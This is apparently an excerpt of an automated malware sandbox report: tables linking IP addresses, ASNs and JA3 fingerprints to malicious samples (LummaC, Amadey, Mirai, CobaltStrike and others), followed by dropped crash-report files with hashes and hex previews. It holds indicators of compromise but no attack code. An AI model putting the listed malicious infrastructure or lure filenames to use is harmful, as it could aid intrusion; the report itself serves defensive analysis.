                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                                bg.microsoft.map.fastly.netClient-built.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                                                wayneenterprisesbatcave-6.0.1901-windows-installer.msiGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                                                Untitled-1.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                                                new.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                                                Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                                                BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                                                Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                                                InvoiceNr274728.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                                                PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                                                HA9wRLGT9y.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 199.232.214.172

                                                                                                                                                                                                                                                ASNs

                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                AS-CHOOPAUSfile.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                                • 45.77.249.79
                                                                                                                                                                                                                                                Setup.exe (1).zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 209.222.21.115
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                                • 45.77.249.79
                                                                                                                                                                                                                                                mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 149.248.45.75
                                                                                                                                                                                                                                                bot.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                • 45.32.181.8
                                                                                                                                                                                                                                                rebirth.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                • 108.61.131.209
                                                                                                                                                                                                                                                Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 45.77.249.79
                                                                                                                                                                                                                                                http://home45insurance.blogspot.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 45.63.66.114
                                                                                                                                                                                                                                                file.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                • 45.76.104.174
                                                                                                                                                                                                                                                loligang.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                • 149.28.254.238
                                                                                                                                                                                                                                                AKAMAI-ASUSfile.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                                • 104.121.10.34
                                                                                                                                                                                                                                                ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                                • 23.66.101.207
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                • 104.121.10.34
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                                • 23.37.186.133
                                                                                                                                                                                                                                                https://ivsmn.kidsavancados.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 23.60.85.188
                                                                                                                                                                                                                                                bad.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                • 2.19.198.72
                                                                                                                                                                                                                                                Yogi Tea Benefits Open Enrollment.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                • 2.19.126.151
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                                • 104.121.10.34
                                                                                                                                                                                                                                                Tbconsulting Company Guidelines Employee Handbook.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 2.19.198.26
                                                                                                                                                                                                                                                DIGITALOCEAN-ASNUSfile.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                                • 178.62.201.34
                                                                                                                                                                                                                                                Client-built.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                                • 138.68.79.95
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                • 178.62.201.34
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                PO DOC.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                • 164.90.188.192
                                                                                                                                                                                                                                                236236236.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 138.68.116.54
                                                                                                                                                                                                                                                MDtEXRDJ3N.htmlGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                                                                                                                • 68.183.112.81
                                                                                                                                                                                                                                                OmUg4Vt9Cg.htmlGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                                                                                                                • 68.183.112.81
                                                                                                                                                                                                                                                mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                • 174.138.36.14

                                                                                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                • 104.121.10.34
                                                                                                                                                                                                                                                • 45.77.249.79
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                • 104.121.10.34
                                                                                                                                                                                                                                                • 45.77.249.79
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                • 104.121.10.34
                                                                                                                                                                                                                                                • 45.77.249.79
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                • 104.121.10.34
                                                                                                                                                                                                                                                • 45.77.249.79
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                • 104.121.10.34
                                                                                                                                                                                                                                                • 45.77.249.79
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                • 104.121.10.34
                                                                                                                                                                                                                                                • 45.77.249.79
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                • 104.121.10.34
                                                                                                                                                                                                                                                • 45.77.249.79
                                                                                                                                                                                                                                                wf1Ps82LYF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                • 104.121.10.34
                                                                                                                                                                                                                                                • 45.77.249.79
                                                                                                                                                                                                                                                IMAKBWPY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                • 104.121.10.34
                                                                                                                                                                                                                                                • 45.77.249.79
                                                                                                                                                                                                                                                JIKJCBEX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                • 104.121.10.34
                                                                                                                                                                                                                                                • 45.77.249.79

                                                                                                                                                                                                                                                Dropped Files

                                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SkaKk8Z1J0.exe_adb6cf2d8b599b9bac28759c6604538e7a83fa3_cd171daf_15a3ea94-3ce1-4ee5-bf95-7af012d7c2c5\Report.wer

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                                                                                Entropy (8bit):0.9582164028767984
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:WO1M+T6jTs9h4Bf74sfKQXIDcQDc6YcEWcw3MJr+HbHg/wWGTf3hOyc45WAU6NCa:i+6THK+09cMhjsFRzuiFgZ24IO8iJ
                                                                                                                                                                                                                                                MD5:C4BA9EDC66385B4BA030CA9132AE5E52
                                                                                                                                                                                                                                                SHA1:935AD832323FB42D460CFD7188122D775329EEE6
                                                                                                                                                                                                                                                SHA-256:08DBD67DE82A5C69B4BCB0F1B53FB1D8DBE9A12DD4FEAE9A6C0B7AC8F2C2E31B
                                                                                                                                                                                                                                                SHA-512:F648B22AE05119D9539FEB9DF0F306062567FB18BBB7C6F0A4BCB1E29C0E2B27DD31D331E61F0ABB66D2E48E74AB17E2EEC74A77DD8611E073258CB4BCDDFD8C
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.9.3.2.6.1.0.2.8.0.1.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.8.9.3.2.6.2.2.4.6.7.3.9.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.5.a.3.e.a.9.4.-.3.c.e.1.-.4.e.e.5.-.b.f.9.5.-.7.a.f.0.1.2.d.7.c.2.c.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.e.6.4.2.0.8.8.-.7.b.9.7.-.4.a.2.4.-.9.7.b.7.-.2.f.8.8.e.8.d.b.c.7.1.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.k.a.K.k.8.Z.1.J.0...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.5.4.-.0.0.0.1.-.0.0.1.4.-.6.3.0.f.-.e.4.4.2.5.3.5.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.9.b.7.4.2.3.1.9.4.5.9.5.2.b.3.6.7.a.3.3.d.4.d.8.f.d.d.9.9.d.d.0.0.0.0.f.f.f.f.!.0.0.0.0.9.5.c.9.f.c.f.a.6.a.c.6.3.1.f.4.0.1.f.2.6.9.2.a.b.9.a.b.3.6.a.9.1.f.5.8.d.5.b.3.!.S.k.a.K.k.8.Z.1.J.0...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SkaKk8Z1J0.exe_fe549d3a842053581c7b2ab49d0f91126d44f3_cd171daf_9805c221-e27c-4235-85ec-f969a5668bb2\Report.wer

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                                                                                Entropy (8bit):0.9579047929282972
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:jy8mP6jBs9h4Bf74kGSZQXIDcQVc6DcETcw3uJr+HbHg/wWGTf3hOyc45WAU6NC3:/BBHKh0rH5fjsFRzuiFgZ24IO8PJ
                                                                                                                                                                                                                                                MD5:3D692C45704DA0EFB71BD3EC882603EA
                                                                                                                                                                                                                                                SHA1:C77B3C14FEBA78D271DA81CB5CE5F97487E898CC
                                                                                                                                                                                                                                                SHA-256:1AF165B5A3453C9794CA212E51E138ED545D5B10E68AF2852F91B531799BA7D2
                                                                                                                                                                                                                                                SHA-512:A535A6A1DEACBEF7039BC78CB395BD66571CB67F94A2822A3BD16143CBA3971B078EDB52D4145EF103AB68D1DC06751A4D22A625C0B6828DC379A7FD6E042407
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.9.3.2.5.9.4.7.1.4.5.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.1.3.1.0.7.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.8.0.5.c.2.2.1.-.e.2.7.c.-.4.2.3.5.-.8.5.e.c.-.f.9.6.9.a.5.6.6.8.b.b.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.0.d.f.4.3.2.1.-.0.6.9.c.-.4.5.7.c.-.a.1.8.7.-.7.0.f.7.4.4.8.d.c.3.7.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.k.a.K.k.8.Z.1.J.0...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.5.4.-.0.0.0.1.-.0.0.1.4.-.6.3.0.f.-.e.4.4.2.5.3.5.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.9.b.7.4.2.3.1.9.4.5.9.5.2.b.3.6.7.a.3.3.d.4.d.8.f.d.d.9.9.d.d.0.0.0.0.f.f.f.f.!.0.0.0.0.9.5.c.9.f.c.f.a.6.a.c.6.3.1.f.4.0.1.f.2.6.9.2.a.b.9.a.b.3.6.a.9.1.f.5.8.d.5.b.3.!.S.k.a.K.k.8.Z.1.J.0...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2././.1.1.:.2.1.:.0.4.:.3.4.!.0.!.S.k.a.K.k.8.Z.1.

                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER1E91.tmp.dmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Tue Dec 17 07:14:20 2024, 0x1205a4 type
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):56534
                                                                                                                                                                                                                                                Entropy (8bit):2.7011668146806853
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:PxhlsXuN+9LEChOp1BCujxl/zHvuMat+BXpmx8i6ObynOqS7iQ5r7xuTsWBp4JR:ph3+9LET7BCuHzGnjFy6f98o8gR
                                                                                                                                                                                                                                                MD5:3A63A968AF5924F9C391DADB51233166
                                                                                                                                                                                                                                                SHA1:1EC03F42C91D72F9BE1C7DB204ED1CBADB3E1063
                                                                                                                                                                                                                                                SHA-256:C99D3A2B28FA4331B034DB8E481F9CFB214D0D13601F2F4F7F51ACA7DF3DBF3F
                                                                                                                                                                                                                                                SHA-512:A9D789E7F6435F7DA5DA87ADC130D3709B1AC4CA7F15819F99DE23E2A17FD24AB88A8200CBF6C742B33350A801B72E93517E925E834583FE0195897912FD7DF9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:MDMP..a..... ........$ag............4...............H...........<............-..........`.......8...........T...........`A..v.......................................................................................................eJ......t ......GenuineIntel............T.......T....$ag.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER21BE.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8394
                                                                                                                                                                                                                                                Entropy (8bit):3.6948008662306213
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:R6l7wVeJ4O6k6YN1SUSWDgmfiS2HpN389bbU1frJm:R6lXJJ6k6YfSUSWDgmfWUb+fo
                                                                                                                                                                                                                                                MD5:80A89D650DE3CDC1B17A2C9FE85ED8D0
                                                                                                                                                                                                                                                SHA1:9AFD99F2D22A5FDA43B2A434144451AF6070BE85
                                                                                                                                                                                                                                                SHA-256:51A569DE66855CAAB9DA8DD3C986742D104D1A916D4E59E889059658EE9DEEE5
                                                                                                                                                                                                                                                SHA-512:5A995600884C78B69CD30729966638E61349A29BEDFF6EE17AE0528AC7866F72C98DB60C61E4275759D4E9F98E5B0E9095C17DAE918421F1B2BA3D2B6BC83E18
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.6.9.2.<./.P.i.

                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER220D.tmp.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4680
                                                                                                                                                                                                                                                Entropy (8bit):4.462074994497096
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:cvIwWl8zsMJg77aI9RmWpW8VY2Ym8M4JD9wNFedo+q8vc9wJDSzZOd:uIjfKI7nn7VaJdGK1OzZOd
                                                                                                                                                                                                                                                MD5:C0FCFD2695432FE4B10790E4355D9454
                                                                                                                                                                                                                                                SHA1:7862EFD86D33978D7E259D8DAFD1E6841985253F
                                                                                                                                                                                                                                                SHA-256:9EDBF3CCFFF4B3B73A2CF39A3010C49E4CEF8964EB1BE679D9B93AA5354B3112
                                                                                                                                                                                                                                                SHA-512:1D2E5276BD59A79EB0AA272F1F13514866691DB364925B56E466C67BFC8DF401E4552580ED45544EB075E555B438FCF720B111762534B5FDC28893BF83F57D15
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634937" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER24AB.tmp.dmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Tue Dec 17 07:14:21 2024, 0x1205a4 type
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):52854
                                                                                                                                                                                                                                                Entropy (8bit):2.751111649360065
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:UrzfMrsXuN+9LZNkOp1BQZrjxlEHvuMat+BXvWUPmYDCFeib/Hgl97fWJ2wQ56CX:ADM9+9LH7BOrsGneSvHgl9Kc5qnnu
                                                                                                                                                                                                                                                MD5:4284ACFC834862FE23EBA9AFBAC2AF0E
                                                                                                                                                                                                                                                SHA1:23F444EEEA8E758C648DF77F5676A584E9E7417B
                                                                                                                                                                                                                                                SHA-256:B6CA0F6EAD681675EA2143AD48F324B132FBAAB51EDAE8EC5D91182EF582C470
                                                                                                                                                                                                                                                SHA-512:9EFBA211BFF444E66B2C3E858E514C2A79F04F678FBD110343F64964FB0B767E775F7FC12C3C3194CA8BEA4BBC9B9D7B431823AD5719010538DAEBE1F0850E9D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:MDMP..a..... ........$ag............4...............H...........<............-..........`.......8...........T...........8A..>.......................................................................................................eJ......t ......GenuineIntel............T.......T....$ag.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2865.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8316
                                                                                                                                                                                                                                                Entropy (8bit):3.6941121704690305
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:R6l7wVeJ4x66hC6YNpSUtErggmfHSCJpDB89bpUsfKljm:R6lXJm66E6YjSUtErggmf5SpHfK8
                                                                                                                                                                                                                                                MD5:1B0613AFF341995C8226CBC042B5A2BE
                                                                                                                                                                                                                                                SHA1:D68558D7269C6E9A27B193E20C527773E74A80E8
                                                                                                                                                                                                                                                SHA-256:3D19E8E20D2791F76F1E6D052EFE1DCEEC45B9CF1FBF5AD4019D12969E98701D
                                                                                                                                                                                                                                                SHA-512:44CC40379D22DD77B76E10FE92ECFEBA837BE79D340298E4E62884FF6697558572896FD08B7D9A20057DA6EF820E13FDE963B0E2ED5BD0FDEDD2B168FE5E35BE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.6.9.2.<./.P.i.

                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER28A5.tmp.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4579
                                                                                                                                                                                                                                                Entropy (8bit):4.475096519451422
